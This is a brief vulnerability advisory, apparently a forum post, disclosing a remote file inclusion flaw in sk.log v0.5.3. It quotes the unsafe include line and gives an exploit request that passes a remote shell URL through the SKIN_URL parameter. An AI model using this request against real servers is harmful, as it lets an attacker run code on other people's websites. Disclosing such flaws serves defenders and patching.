++++++++++++++++++++++++++++++++++++++++++++++++++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++++++++++++++++++++++++++++++++++++++++++++++++++

+ Vulnerable Code

+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );

+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]

+ Script Download
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip

[ reply ]